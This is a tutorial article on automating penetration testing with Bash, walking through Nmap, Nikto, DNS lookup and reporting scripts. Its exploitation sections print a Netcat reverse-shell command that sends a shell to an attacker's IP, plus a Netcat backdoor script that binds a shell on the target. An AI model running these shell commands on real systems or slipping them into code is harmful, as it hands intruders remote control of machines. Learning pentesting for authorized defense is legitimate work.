Penetration testing is the process of assessing the security of a computer system, network, or web application by mimicking an attack. This identifies weaknesses, misconfigurations, and vulnerabilities that might be exploited by attackers. Shell scripting is one of the most powerful tools for penetration testing since it can automate most tasks, making the process more efficient and comprehensive. In this article, we will learn about penetration testing with shell scripting, the tools that are generally used, and give some hands-on examples on how shell scripts can be employed for security auditing.
#!/bin/bash
# Penetration Testing Automation Script
echo "Starting reconnaissance..."
nmap -sS -T4 -A $1 > nmap_report.txt
echo "Starting vulnerability scan..."
nikto -h $1 > nikto_report.txt
echo "Generating report..."
echo "Penetration Test Report" > final_report.txt
echo "Reconnaissance Results:" >> final_report.txt
cat nmap_report.txt >> final_report.txt
echo "Vulnerability Scan Results:" >> final_report.txt
cat nikto_report.txt >> final_report.txt
echo "Report generated as final_report.txt"
### Understanding Shell Scripting for Penetration Testing
Shell scripting is a technique of automating commands in a Linux or Unix-like system. Penetration testers employ shell scripts to automate reconnaissance, vulnerability scanning, exploitation, and post-exploitation tasks. The most popular shell to script with in Linux is **Bash**, although other shells such as **Zsh** and **Fish** are employed.
Penetration testing with shell scripting comprises the following steps:
1. **Reconnaissance**: Gathering information on the target.
2. **Vulnerability Analysis**: Finding vulnerabilities in the target system.
3. **Exploitation**: Trying to exploit the vulnerabilities.
4. **Post-Exploitation**: Achieving persistent access and retaining control of the system.
Shell scripting can make it easier by doing the process automatically, including scanning, collecting system information, exploiting vulnerabilities, and even creating reports.
### Pre-requisites for Penetration Testing using Shell Scripting
Before we jump into shell scripting in the field of penetration testing, let's configure a good environment. Here's what you'll require:
1. **Linux/Unix-based Operating System**: Shell scripting is preferably run on Linux or any Unix-based operating system.
2. **Terminal/Command-Line Interface**: Here you'll run the shell scripts.
3. **Penetration Testing Tools**: Some of the common tools are **Nmap** (network scanner), **Netcat** (network utility), **Nikto** (web scanner), **Metasploit** (exploitation framework), and **Hydra** (brute-force password cracker).
4. **Permission to Test**: Always make sure that you have explicit permission to test the systems involved. Unauthorized penetration testing is illegal and unethical.
### 1. Reconnaissance with Shell Scripting
Reconnaissance is the initial stage of penetration testing, wherein you acquire data on the target system. Reconnaissance can be carried out in two stages: **active reconnaissance** and **passive reconnaissance**.
#### 1.1 Active Reconnaissance
Active reconnaissance refers to directly engaging with the target system. You can utilize **Nmap** and **Netcat** in shell scripts to scan the network and determine live hosts, open ports, and services on the target.
**Example 1: Network Scanning with Nmap**
```bash
#!/bin/bash
```
# Basic Nmap Scan Script
echo "Enter the target IP address: "
read target
echo "Scanning the target."
nmap -sS -T4 -A $target
This script will ask for the target IP as input and perform an Nmap scan to find live hosts, open ports, and services. The `-sS` scans for SYN, `-T4` sets up for fast scanning, and `-A` for OS detection and version scanning.
#### 1.2 Passive Reconnaissance
Passive reconnaissance is the process of getting information without being directly involved with the target. This can be achieved by querying publicly accessible resources like domain registries, DNS records, and social media sites.
**Example 2: DNS Lookup Using Shell Script**
```bash
#!/bin/bash
# DNS Lookup Script
echo "Enter the domain name: "
read domain
echo "Performing DNS lookup."
nslookup $domain
```
This script asks the DNS records of a domain using the `nslookup` command.
### 2. Vulnerability Scanning with Shell Scripting
Once reconnaissance is completed, the next step is to identify vulnerabilities. Tools like **Nikto**, **OpenVAS**, or **Nmap** can be used to find known vulnerabilities in web servers, network services, and applications.
**Example 3: Web Server Vulnerability Scan with Nikto**
```bash
#!/bin/bash
# Nikto Web Server Scan Script
echo "Enter the target IP address or domain: "
read target
echo "Scanning the web server for vulnerabilities."
nikto -h $target
```
This script employs Nikto to scan a web server for typical vulnerabilities like old software versions, security misconfigurations, and possible exploits.
### 3. Exploitation using Shell Scripting
Exploitation is where penetration testers try to access the target system by exploiting the vulnerabilities that have been discovered. Tools such as **Metasploit** can be employed for advanced exploits, but basic shell scripting can also make exploitation easier with tools such as **Netcat**.
**Example 4: Netcat Reverse Shell**
```bash
#!/bin/bash
# Netcat Reverse Shell Script
echo "Enter your IP address (attacker): "
read attacker_ip
echo "Enter the port to listen on: "
read port
echo "Waiting for a connection."
nc -lvnp $port
```
This script creates a listener with **Netcat** on the attacker's system. Once the reverse shell is created, the attacker can take control of the target machine.
On the target system, one can execute the following command to open a reverse shell connection to the attacker's system:
```bash
nc -e /bin/bash [attacker_ip] [port]
```
The above command opens a connection from the target system to the attacker's system, giving the attacker remote shell capabilities.
### 4. Post-Exploitation with Shell Scripting
Once inside a system, penetration testers usually conduct post-exploitation operations to collect additional information and keep access. This may involve tasks like privilege escalation, installing backdoors, and stealing sensitive information.
**Example 5: Privilege Escalation Script (Check for Sudo Access)**
```bash
#!/bin/bash
# Check for Sudo Access Script
echo "Checking for sudo privileges."
sudo -l
```
This script checks if the user has any sudo access, which might be used for privilege escalation.
**Example 6: Creating a Backdoor with Netcat**
```bash
#!/bin/bash
# Backdoor Script
echo "Setting up a backdoor on the target system."
nc -lvp 1234 -e /bin/bash &
```
This script establishes a backdoor on the target system by listening with **Netcat** on port 1234. The `-e` option is used to execute a shell (`/bin/bash`) on connection.
### 5. Automating Tasks and Generating Reports
Penetration testers often automate repetitive tasks and generate reports for clients. This can be done with shell scripts that combine various tools and produce a structured output.
**Example 7: Automation and Reporting**
```bash
#!/bin/bash
# Penetration Testing Automation Script
echo "Starting reconnaissance."
nmap -sS -T4 -A $1 > nmap_report.txt
echo "Starting vulnerability scan."
nikto -h $1 > nikto_report.txt
echo "Generating report."
echo "Penetration Test Report" > final_report.txt
echo "Reconnaissance Results:" >> final_report.txt
cat nmap_report.txt >> final_report.txt
echo "Vulnerability Scan Results:" >> final_report.txt
cat nikto_report.txt >> final_report.txt
echo "Report generated as final_report.txt"
This script scans the network using Nmap, scans for vulnerabilities using Nikto, and creates a report that includes both tools' output.
### Conclusion
Shell scripting is an important function of penetration testing as it enables the penetration tester to automate activities, save time, and conduct in-depth testing. Penetration testers are able to conduct reconnaissance, vulnerability scanning, exploitation, and post-exploitation more efficiently and in an organized way by using different tools and scripting methods combined.
However, it's important to note that ethical considerations must always be taken into account when performing penetration testing. Always ensure that you have explicit permission from the system owner before conducting any form of penetration testing. Unauthorized testing can lead to legal consequences.
By ongoing learning and practice, penetration testers can further develop their skills in shell scripting and apply it to automate even more complex tasks, ultimately enhancing the overall security stance of organizations and systems.
